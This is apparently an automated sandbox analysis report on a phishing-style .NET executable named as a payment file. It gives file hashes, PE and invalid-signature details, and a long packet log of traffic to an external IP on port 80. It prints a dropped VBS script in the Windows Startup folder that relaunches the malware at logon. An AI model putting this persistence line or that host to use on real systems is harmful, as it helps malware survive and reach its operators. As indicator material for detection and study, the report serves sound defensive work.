Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbs

Download File

Process:	C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	87
Entropy (8bit):	4.706532548942545
Encrypted:	false
SSDEEP:	3:FER/n0eFHHoMERE2J5WGYTwVrn:FER/lFHIFi23WGYc
MD5:	19D323C13A43D5871D5AC24D125B1207
SHA1:	8ADD7CDCD2507F0E6F936130B455AB8DDA9E18F6
SHA-256:	BFF935777CA5424C12093D472D1FB2AB9CA0487CFD29E6E17B46DD5C4F8A29A9
SHA-512:	D92092643BD8B9F0305FAC0E85B02E5D98E97D9FEB67E1DBC89C6FAC17A3F4A63A5B4D285B7C814D3F7067DD0612372A264D52C0472453B0A39A40317E032206
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Local\scriptcase-php8.exe"""

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.625794477334237
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
File size:	1'845'544 bytes
MD5:	622b4fb4e2d8e9a803f526a77c867590
SHA1:	ecfac03a1de7cbef3b10f0e73c251b77edb63969
SHA256:	006c7725348c5fe7ef76cbce10e36c8cc5ba01c484d1107f63a29768d11dce86
SHA512:	ce0b562a070824bf92ecf77326da12f7eebf921c7912a71a0865cbe0fc37764a9b81b1974670bf2e36dd2d2853faa7a642ca6c83b6a283a51e7e069728b7dc54
SSDEEP:	24576:SIUT3GoAMU+DrPSD1DNqETFyuvc0Mr/QqAX9WLJFvIjzFB4Kac:B9FMFPeYET0uvoQp9WzAjzFBZ
TLSH:	0685EA03BA9755B3C71C1F76C59E09144378E4B5A61BF21E364E332948837BAAACC17E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.Rg.................^...........\|... ........@.. .......................@............`................................

File Icon


Icon Hash:	68609b9393166970

Static PE Info

General

Entrypoint:	0x597cbe
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6752BD3F [Fri Dec 6 09:00:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	08/05/2024 02:00:00 14/05/2025 01:59:59
Subject Chain	CN=Netmake Solucoes em Informatica Ltda, O=Netmake Solucoes em Informatica Ltda, L=Olinda, S=Pernambuco, C=BR, SERIALNUMBER=04.095.869/0001-18, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=BR
Version:	3
Thumbprint MD5:	C3709FC102AE6E39229F291ED57E3EAC
Thumbprint SHA-1:	C36565B2558D1B285CCB07E23F195CB9BAFFDB78
Thumbprint SHA-256:	19EB89E23F21F8A3EB355150F8D809456221C56F5BA55533BB6343E0328DEF95
Serial:	09183158E703855D1080C1C20857A8EF

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x197c70	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x198000	0x296c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1bfa00	0x2f28
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1c2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x195cc4	0x195e00	06f7529a63ec5b4219d505ba631fb60d	False	0.3337148954804435	data	5.516033239507528	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x198000	0x296c8	0x29800	ea66e8424e0a2cbc7bd27a85a95d22d1	False	0.09868575865963855	data	3.5742339084718826	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1c2000	0xc	0x200	767d86f4278fc37c5178afdd7e6822ff	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x1982b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5663 x 5663 px/m	0.374113475177305
RT_ICON	0x198718	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 5663 x 5663 px/m	0.25
RT_ICON	0x1990a0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5663 x 5663 px/m	0.18832082551594748
RT_ICON	0x19a148	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5663 x 5663 px/m	0.12334024896265561
RT_ICON	0x19c6f0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5663 x 5663 px/m	0.08862777515351913
RT_ICON	0x1a0918	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 5663 x 5663 px/m	0.07661737523105361
RT_ICON	0x1a5da0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 5663 x 5663 px/m	0.053552659239016184
RT_ICON	0x1af248	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5663 x 5663 px/m	0.04034070744114516
RT_ICON	0x1bfa70	0x169c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9208707671043538
RT_GROUP_ICON	0x1c110c	0x84	data	0.7272727272727273
RT_VERSION	0x1c1190	0x34c	data	0.41824644549763035
RT_MANIFEST	0x1c14dc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 11:05:29.339684010 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:29.460227966 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:29.460347891 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:29.461133957 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:29.580846071 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.698776007 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.698884964 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.698941946 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.698945999 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.698959112 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.698971987 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.699001074 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.699047089 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.699090004 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.699111938 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.699126005 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.699137926 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.699150085 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.699166059 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.699189901 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.820609093 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.822221041 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.822314024 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.826095104 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.880059004 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.890901089 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.891102076 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.891153097 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.895054102 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.895148993 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.895186901 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.901520967 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.901654005 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.901710033 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.910656929 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.910677910 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.910778046 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.918486118 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.918596983 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.918822050 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.926762104 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.926856995 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.926944971 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.935220957 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.935292006 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.935350895 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.943553925 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.943583012 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.943636894 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.951925039 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.951978922 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.952033997 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.960331917 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.960369110 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.960423946 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:30.999943972 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:30.999989033 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.000082016 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.004148006 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.051918983 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.082901955 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.082982063 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.083029985 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.085282087 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.085320950 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.085414886 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.088954926 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.089031935 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.089082956 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.093569994 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.093669891 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.093727112 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.098269939 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.098376989 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.098429918 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.102931976 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.103024006 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.103079081 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.107528925 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.107635975 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.107687950 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.112298965 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.112447023 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.112494946 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.116945028 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.117003918 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.117053032 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.121684074 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.121850014 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.123636961 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.126305103 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.126408100 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.126446962 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.130956888 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.131052017 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.131227970 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.135736942 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.135842085 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.135883093 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.140407085 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.140499115 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.143388033 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.145016909 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.145296097 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.145354033 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.149708033 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.149825096 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.149887085 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.154392958 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.154486895 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.154537916 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.159037113 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.159136057 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.159348011 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.163705111 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.163820982 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.163880110 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.168488979 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.168608904 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.168654919 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.173161030 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.173178911 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.173233986 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.177784920 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.177895069 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.178476095 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.202814102 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.255074978 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.274983883 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.275010109 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.275144100 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.276536942 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.276634932 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.276698112 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.281696081 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.281864882 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.281912088 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.282680988 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.282789946 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.282830954 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.289565086 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.290183067 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.290232897 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.290898085 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.291075945 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.291126013 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.293929100 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.294095039 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.294152021 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.296829939 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.297005892 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.297055006 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.299577951 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.299591064 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.299644947 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.302694082 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.302802086 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.302860022 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.305468082 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.305603981 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.305654049 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.308244944 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.308413982 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.308456898 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.311012030 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.311127901 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.311184883 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.312505960 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.312519073 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.312557936 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.314496994 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.314578056 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.314627886 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.318104982 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.318118095 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.318170071 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.319924116 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.319993019 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.320053101 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.322815895 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.322891951 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.322936058 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.325443029 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.325491905 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.325537920 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.328219891 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.328449011 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.328495026 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.334446907 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.334459066 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.334527969 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.335935116 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.336067915 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.336169004 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.338623047 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.338635921 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.338696957 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.341515064 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.341531992 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.341624975 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.344228029 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.344405890 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.344465017 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.346934080 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.347106934 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.347479105 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.349801064 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.349821091 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.349874973 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.352518082 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.352535963 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.352600098 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.355304003 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.355321884 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.355416059 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.357956886 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.358093977 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.358148098 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.360776901 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.360790014 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.360847950 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:31.363539934 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:31.363701105 CET	80	49708	45.9.191.182	192.168.2.10
